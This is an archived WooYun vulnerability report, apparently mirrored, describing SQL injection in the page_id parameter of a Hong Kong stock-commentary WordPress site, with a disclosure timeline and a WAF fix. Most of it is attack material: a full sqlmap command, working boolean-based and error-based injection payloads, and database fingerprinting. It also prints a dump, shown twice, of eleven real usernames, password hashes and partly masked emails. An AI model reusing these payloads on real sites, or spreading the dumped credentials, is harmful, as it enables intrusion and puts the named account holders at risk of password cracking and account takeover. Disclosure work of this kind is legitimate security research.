乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经确认,细节仅向厂商公开 2015-12-11: 细节向核心白帽子及相关领域专家公开 2015-12-21: 细节向普通白帽子公开 2015-12-31: 细节向实习白帽子公开 2016-01-15: 细节向公众公开
50大異動股各有故事,為你剖析精彩故事背後的情節。
地址:http://**.**.**.**/?page_id=3572
$ python sqlmap.py -u "http://**.**.**.**/?page_id=3572" -p page_id --technique=BE --random-agent --batch -D Topic -T wp_users -C user_login,user_pass,user_email --dump
Database: TopicTable: wp_users[11 entries]+------------+------------------------------------+--------------------------+| user_login | user_pass | user_email |+------------+------------------------------------+--------------------------+| eddielai | $P$B2OqWtmSaKJIcaCPVrUBenCquEstjR0 | eddielai@**.**.**.** || dickleung | $P$B5Z7ykE171/E4alqaCeiT/HF2mtcmR1 | dickleung@**.**.**.** || victor | $P$BEK2caFAN2/g/hdExZ8L7icgxtTCCG1 | victorcheng@**.**.**.** || gennie | $P$BGrAOv8qS78JOdNKqUrjAX8zgO84/O/ | gennielam@**.**.**.** || fancalee | $P$BGsvcxcwAZFtsEmjm6TUzCT3G.eSHy. | francalee@**.**.**.** || carol | $P$BgUkEJ6JKYYc9RhHYrASNKDmXZWln8. | carolchan@**.**.**.** || Wan | $P$BiXSUlA3jg.1sulSLzy4rXHjnaY6Ks/ | wancham@**.**.**.** || fin_dev | $P$BpHpIlADLDbbte4VEB32UTkdT0R8CP0 | keithsiu@**.**.**.** || Davis | $P$BR3/SCFpZPAMrrGYahdjLXMCLjoPQh/ | davisho@**.**.**.** || Tony | $P$BrZQHnmOIzJHeIJ4rtfcoLV8EtNpZA/ | tonyleung@**.**.**.** || pakyeung | $P$BW4jKPCENNH2YtKqhO.a5phbyPPbCs1 | pakyeung@**.**.**.** |+------------+------------------------------------+--------------------------+
---Parameter: page_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=3572 AND 4735=4735 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page_id=3572 AND (SELECT 8111 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8111=8111,1))),0x716a786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0current user: 'topicadm@%'current user is DBA: Falsedatabase management system users [1]:[*] 'topicadm'@'%'Database: Topic+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| wp_postmeta | 4755 || wp_posts | 3250 || wp_term_relationships | 1047 || wp_usermeta | 174 || wp_options | 139 || wp_hdwplayer | 92 || wp_hdwplayer_videos | 83 || wp_term_taxonomy | 46 || wp_terms | 46 || wp_users | 11 || wp_Spider_Video_Player_theme | 7 || wp_Spider_Video_Player_tag | 2 || wp_hdwplayer_playlist | 1 || wp_Spider_Video_Player_player | 1 || wp_Spider_Video_Player_playlist | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 745 || GLOBAL_STATUS | 291 || SESSION_STATUS | 291 || GLOBAL_VARIABLES | 277 || SESSION_VARIABLES | 277 || COLLATION_CHARACTER_SET_APPLICABILITY | 130 || COLLATIONS | 129 || STATISTICS | 99 || PARTITIONS | 68 || TABLES | 68 || KEY_COLUMN_USAGE | 49 || TABLE_CONSTRAINTS | 45 || CHARACTER_SETS | 36 || SCHEMA_PRIVILEGES | 34 || PROCESSLIST | 13 || PLUGINS | 7 || ENGINES | 5 || SCHEMATA | 3 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+Database: Topic_uat+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| wp_postmeta | 3824 || wp_posts | 2057 || wp_term_relationships | 682 || wp_options | 236 || wp_usermeta | 170 || wp_hdwplayer | 92 || wp_hdwplayer_videos | 83 || wp_term_taxonomy | 44 || wp_terms | 44 || wp_users | 11 || wp_Spider_Video_Player_theme | 7 || wp_comments | 2 || wp_Spider_Video_Player_tag | 2 || wp_hdwplayer_playlist | 1 || wp_Spider_Video_Player_player | 1 || wp_Spider_Video_Player_playlist | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: TopicTable: wp_users[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| user_pass | varchar(64) |+-----------+-------------+Database: TopicTable: wp_posts[1 column]+---------------+-------------+| Column | Type |+---------------+-------------+| post_password | varchar(20) |+---------------+-------------+Database: Topic_uatTable: wp_users[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| user_pass | varchar(64) |+-----------+-------------+Database: Topic_uatTable: wp_posts[1 column]+---------------+-------------+| Column | Type |+---------------+-------------+| post_password | varchar(20) |+---------------+-------------+
Database: TopicTable: wp_users[10 columns]+---------------------+---------------------+| Column | Type |+---------------------+---------------------+| display_name | varchar(250) || ID | bigint(20) unsigned || user_activation_key | varchar(60) || user_email | varchar(100) || user_login | varchar(60) || user_nicename | varchar(50) || user_pass | varchar(64) || user_registered | datetime || user_status | int(11) || user_url | varchar(100) |+---------------------+---------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: page_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=3572 AND 4735=4735 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page_id=3572 AND (SELECT 8111 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8111=8111,1))),0x716a786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0Database: TopicTable: wp_users[11 entries]+------------+------------------------------------+--------------------------+| user_login | user_pass | user_email |+------------+------------------------------------+--------------------------+| eddielai | $P$B2OqWtmSaKJIcaCPVrUBenCquEstjR0 | eddielai@**.**.**.** || dickleung | $P$B5Z7ykE171/E4alqaCeiT/HF2mtcmR1 | dickleung@**.**.**.** || victor | $P$BEK2caFAN2/g/hdExZ8L7icgxtTCCG1 | victorcheng@**.**.**.** || gennie | $P$BGrAOv8qS78JOdNKqUrjAX8zgO84/O/ | gennielam@**.**.**.** || fancalee | $P$BGsvcxcwAZFtsEmjm6TUzCT3G.eSHy. | francalee@**.**.**.** || carol | $P$BgUkEJ6JKYYc9RhHYrASNKDmXZWln8. | carolchan@**.**.**.** || Wan | $P$BiXSUlA3jg.1sulSLzy4rXHjnaY6Ks/ | wancham@**.**.**.** || fin_dev | $P$BpHpIlADLDbbte4VEB32UTkdT0R8CP0 | keithsiu@**.**.**.** || Davis | $P$BR3/SCFpZPAMrrGYahdjLXMCLjoPQh/ | davisho@**.**.**.** || Tony | $P$BrZQHnmOIzJHeIJ4rtfcoLV8EtNpZA/ | tonyleung@**.**.**.** || pakyeung | $P$BW4jKPCENNH2YtKqhO.a5phbyPPbCs1 | pakyeung@**.**.**.** |+------------+------------------------------------+--------------------------+
上WAF。
危害等级:中
漏洞Rank:6
确认时间:2015-12-01 16:38
Referred to related parties.
暂无